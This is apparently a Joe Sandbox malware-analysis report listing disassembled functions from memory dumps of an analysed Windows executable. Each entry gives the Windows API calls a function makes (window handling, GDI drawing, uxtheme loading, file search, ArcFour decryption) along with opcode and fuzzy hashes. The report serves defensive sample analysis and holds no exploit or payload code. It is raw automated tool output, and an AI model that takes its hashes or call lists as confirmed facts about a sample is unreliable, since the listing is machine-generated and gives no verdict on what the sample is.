                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3541575487-0
                                                                                                                            • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                                            • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                                                            • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                                            • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004241DC Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32(?), ref: 004241E4
                                                                                                                            • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                              • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021B25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                                                            • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 649377781-0
                                                                                                                            • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                                            • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                                                            • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                                            • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00417CCE Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32(?), ref: 00417D0F
                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Placement$Iconic
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 568898626-0
                                                                                                                            • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                                            • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                                                            • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                                            • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00417598 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CaptureIconic
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2277910766-0
                                                                                                                            • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                                            • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                                                            • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                                            • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00424194 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32(?), ref: 0042419B
                                                                                                                              • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                                              • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                                              • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                                              • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                                            • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2671590913-0
                                                                                                                            • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                            • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                                                            • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                            • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004125D8 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4255912815-0
                                                                                                                            • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                            • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                                                            • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                            • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00478AC0 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4255912815-0
                                                                                                                            • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                            • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                                                            • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                            • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0045D23C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptFour
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2153018856-0
                                                                                                                            • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                            • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                                                            • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                            • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0045D254 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptFour
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2153018856-0
                                                                                                                            • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                                            • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                                                            • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                                            • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 10001130 Relevance: .1, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3386271497.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3386237698.0000000010000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3386358489.0000000010002000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                            • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                                            • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                            • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 10001000 Relevance: .0, Instructions: 2COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3386271497.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3386237698.0000000010000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3386358489.0000000010002000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                            • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                                            • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0044B658 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                            • API String ID: 1968650500-2910565190
                                                                                                                            • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                                            • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                                                            • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                                            • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041CA0C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0041CA40
                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                                                            • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                                                            • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                                                            • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                                                            • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                                                            • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                                                            • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                                                            • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                                                            • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                                                            • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                                                            • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                                                            • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                                                            • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
